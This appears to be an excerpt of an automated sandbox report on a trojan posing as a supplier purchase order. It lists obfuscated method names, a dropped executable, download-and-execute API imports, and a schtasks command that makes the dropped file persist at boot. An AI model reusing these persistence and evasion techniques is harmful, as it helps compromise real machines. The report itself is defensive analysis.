                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, hvqSVpzqu3tDJb0msV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GF96wMEv8d', 'zi16BBgxtZ', 'IcP6bavk3W', 'uaC6ef16Pp', 'qaV64GIiyC', 'bVE66R39uM', 'vi36IwljWQ'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, Wk3seexTX6tZtWvfvc.csHigh entropy of concatenated method names: 'gUap1I936I', 'LVtpH9Hl19', 'hUFpDcwaS5', 'KKlpXHc9wX', 'BCfpZuJceM', 'MPVpOXCWxq', 'j8xpGEymhV', 'YZfpyII8vk', 'lFBpV8QB69', 'AR3pkhOUi8'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, nCU4sZkk0cO2A8tXZc.csHigh entropy of concatenated method names: 'vyW6mKeDls', 'mTI6FV3tM9', 'JQF6qlZjZ9', 'kXF6TMnp9N', 'QQT6pgcotf', 'VEl6tMIp0X', 'mx16NArRmY', 'VZx4GpRdM5', 'L3P4yYZWRa', 'A334VX4XmO'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, A2kagZuBKmr6hPQEK1.csHigh entropy of concatenated method names: 'CxjhgV2aiq', 'mrWh2rhnVj', 'lWvhxNbcyy', 'uXIhuhBqn4', 'NcChBOZOXJ', 'D3YhbIHdd4', 'yFGheoM6is', 'JfWh4FHFYT', 'BMLh6Sin2Z', 'eouhIH49yc'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, oMIwwyvsoaXJBe3Isf.csHigh entropy of concatenated method names: 'v5xwx6xUrw', 'JYTwuRXSQq', 'NR6wCi5SUc', 'oBxwcIWNDC', 'SECwRn51D6', 'Es6wnUOcs7', 'bFtwjU1NQu', 'a2pwEdV2fU', 'AfcwMFlOhK', 'AILwPnq0Ge'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, TPnZ5FqOFg4XKETJii.csHigh entropy of concatenated method names: 'hHymJk3see', 'fX6mrtZtWv', 'UBKm8mr6hP', 'yEKml10GOG', 'I3rmBjhtp0', 'Du9mbEYuFd', 'O6JxNGNyLUgiZhCBWG', 'eyanw6kIPronvWbG9s', 'WLJmmRZBX6', 'TxZmFJOqf3'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.csHigh entropy of concatenated method names: 'vQlF0Xtbdf', 'mjtFTBIrUK', 'i7aFpN1waN', 'RxnFhn6v4O', 'Fu2FtJoDg8', 'yOHFNTE3l4', 'SfxFJcneKm', 'vPXFrcCMD9', 'TpVFdKGvhM', 'aqJF8EJ72u'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, UyWKgQ194m00G4siGn.csHigh entropy of concatenated method names: 'TLmBM5EW1j', 'NmqBSaWvPf', 'e6PB11gqei', 'GuFBHyCCPo', 'dYrBc2bTGj', 'SaGB3ZEH7B', 'jIEBRZlEJB', 'YNuBnrICp1', 'HowBf8pMhZ', 'fiYBjlersV'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, By6nk7mohiH0nFI8D7E.csHigh entropy of concatenated method names: 'B4N69yyWvw', 'F9H6QO3uwv', 'ihD6KZY5XZ', 'WbE6gkY5C9', 'T7F6Awd36a', 'eYt620mLUA', 'eDq67eR8X7', 'KFk6xT4DMt', 'oGl6uXvnRx', 'ATf6YgcUMK'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, EDq8ZKXlx7nTMbYoVg.csHigh entropy of concatenated method names: 'thge8r8vDf', 'EPpelhiNVV', 'ToString', 'pnweTBLsSF', 'n2Eep6EWIX', 'e1jehG3I2p', 'hK1etG8HIg', 'TTReNPVs8u', 'fbyeJrFwNd', 'cWferelp5C'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, qqEwOsO3tIS0TnFlkC.csHigh entropy of concatenated method names: 'h7key4dxrs', 'zSgekRjLuE', 'ja64o2TyU9', 'tm94mjFxFQ', 'eKjePuCmEE', 'V4MeSfkv68', 'TTXevjOjPp', 'QoWe1LQAls', 'twPeHCJTP5', 'hVVeDOh6Cn'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, MainForm.csHigh entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, at4ONG9F0NYCELN5Tj.csHigh entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, zThQNep4lwKpE9O0BC.csHigh entropy of concatenated method names: 'Dispose', 'IVvmVIIR1M', 'Mgyac1W0Ni', 'odZCCOH7n7', 'tmqmke9fTd', 'IOXmzWOSgt', 'ProcessDialogKey', 'KiDaowKvbu', 'J5wam7HO6p', 'EhAaalCU4s'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, yxWKBchUKSW06bE2hl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sL5aVpGmWE', 'E88akydsJv', 'D2ZazZa652', 'grEFot43Fo', 'HuCFmoLnNh', 'NqGFaemGDc', 'nmPFF1JFgj', 'lRlpJUbu05kK3ucJ2eT'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, jSRC5wmFTKLEbN6j3uU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E3QI1gbo2N', 'cBJIH5hZ68', 'vCAID9YLXY', 'WF7IXecOcY', 'Ew5IZjgmQX', 'dy2IOjm3KJ', 'NyaIG76mDc'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, iMftbjagvPfJN33VjN.csHigh entropy of concatenated method names: 'n7DKFjTcd', 'MQBgkVi0a', 'kjt2lIfSV', 'A6d7C0rQR', 'h2cuIApkO', 'OJHYAGyMw', 'qB7g6Rvopn3Fh7amJY', 'exSZfKGYpynCQmkJC4', 'dUr4G2dHd', 'Y8sI5EgbP'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, hp0xu9CEYuFdg9g0GR.csHigh entropy of concatenated method names: 'uHAN0Z89Li', 'w1pNpM6jW5', 'K0YNtltfjs', 'e5ENJb1olu', 'RwpNr3m8ak', 'nLBtZMs5Pu', 'whKtOcRkRB', 'rlitG6I5I2', 'bi1tyuZZMC', 'rGXtVQbxlw'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, aqe9fTydROXWOSgtfi.csHigh entropy of concatenated method names: 'uKI4Ttq2Ch', 'IEn4prwncB', 'i9P4hNexxl', 'sPN4tLbKWj', 'pNJ4NJjEN3', 'EHm4Jb0kB6', 'nH94rEtJdU', 'k7O4drI1y7', 'bqE48mhZMZ', 'F5U4lWH5UX'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, Pl9B1MLSEJ7M2ACnEo.csHigh entropy of concatenated method names: 'wwbJ99GRes', 'xjPJQYB2FZ', 'lNUJKw7CIM', 'E2UJgYmYfD', 'eVbJA8W6yd', 'JMKJ2PdaAm', 'vHuJ7tooSi', 'WxMJxRcO8o', 'ixPJuP0boK', 'Nt5JYbA1sl'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, hvqSVpzqu3tDJb0msV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GF96wMEv8d', 'zi16BBgxtZ', 'IcP6bavk3W', 'uaC6ef16Pp', 'qaV64GIiyC', 'bVE66R39uM', 'vi36IwljWQ'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, Wk3seexTX6tZtWvfvc.csHigh entropy of concatenated method names: 'gUap1I936I', 'LVtpH9Hl19', 'hUFpDcwaS5', 'KKlpXHc9wX', 'BCfpZuJceM', 'MPVpOXCWxq', 'j8xpGEymhV', 'YZfpyII8vk', 'lFBpV8QB69', 'AR3pkhOUi8'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, nCU4sZkk0cO2A8tXZc.csHigh entropy of concatenated method names: 'vyW6mKeDls', 'mTI6FV3tM9', 'JQF6qlZjZ9', 'kXF6TMnp9N', 'QQT6pgcotf', 'VEl6tMIp0X', 'mx16NArRmY', 'VZx4GpRdM5', 'L3P4yYZWRa', 'A334VX4XmO'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, A2kagZuBKmr6hPQEK1.csHigh entropy of concatenated method names: 'CxjhgV2aiq', 'mrWh2rhnVj', 'lWvhxNbcyy', 'uXIhuhBqn4', 'NcChBOZOXJ', 'D3YhbIHdd4', 'yFGheoM6is', 'JfWh4FHFYT', 'BMLh6Sin2Z', 'eouhIH49yc'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, oMIwwyvsoaXJBe3Isf.csHigh entropy of concatenated method names: 'v5xwx6xUrw', 'JYTwuRXSQq', 'NR6wCi5SUc', 'oBxwcIWNDC', 'SECwRn51D6', 'Es6wnUOcs7', 'bFtwjU1NQu', 'a2pwEdV2fU', 'AfcwMFlOhK', 'AILwPnq0Ge'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, TPnZ5FqOFg4XKETJii.csHigh entropy of concatenated method names: 'hHymJk3see', 'fX6mrtZtWv', 'UBKm8mr6hP', 'yEKml10GOG', 'I3rmBjhtp0', 'Du9mbEYuFd', 'O6JxNGNyLUgiZhCBWG', 'eyanw6kIPronvWbG9s', 'WLJmmRZBX6', 'TxZmFJOqf3'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.csHigh entropy of concatenated method names: 'vQlF0Xtbdf', 'mjtFTBIrUK', 'i7aFpN1waN', 'RxnFhn6v4O', 'Fu2FtJoDg8', 'yOHFNTE3l4', 'SfxFJcneKm', 'vPXFrcCMD9', 'TpVFdKGvhM', 'aqJF8EJ72u'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, UyWKgQ194m00G4siGn.csHigh entropy of concatenated method names: 'TLmBM5EW1j', 'NmqBSaWvPf', 'e6PB11gqei', 'GuFBHyCCPo', 'dYrBc2bTGj', 'SaGB3ZEH7B', 'jIEBRZlEJB', 'YNuBnrICp1', 'HowBf8pMhZ', 'fiYBjlersV'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, By6nk7mohiH0nFI8D7E.csHigh entropy of concatenated method names: 'B4N69yyWvw', 'F9H6QO3uwv', 'ihD6KZY5XZ', 'WbE6gkY5C9', 'T7F6Awd36a', 'eYt620mLUA', 'eDq67eR8X7', 'KFk6xT4DMt', 'oGl6uXvnRx', 'ATf6YgcUMK'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, EDq8ZKXlx7nTMbYoVg.csHigh entropy of concatenated method names: 'thge8r8vDf', 'EPpelhiNVV', 'ToString', 'pnweTBLsSF', 'n2Eep6EWIX', 'e1jehG3I2p', 'hK1etG8HIg', 'TTReNPVs8u', 'fbyeJrFwNd', 'cWferelp5C'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, qqEwOsO3tIS0TnFlkC.csHigh entropy of concatenated method names: 'h7key4dxrs', 'zSgekRjLuE', 'ja64o2TyU9', 'tm94mjFxFQ', 'eKjePuCmEE', 'V4MeSfkv68', 'TTXevjOjPp', 'QoWe1LQAls', 'twPeHCJTP5', 'hVVeDOh6Cn'
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00406EEB ShellExecuteW,URLDownloadToFileW,12_2_00406EEB
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeFile created: C:\Users\user\AppData\Roaming\keHuNxIumw.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AADB

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
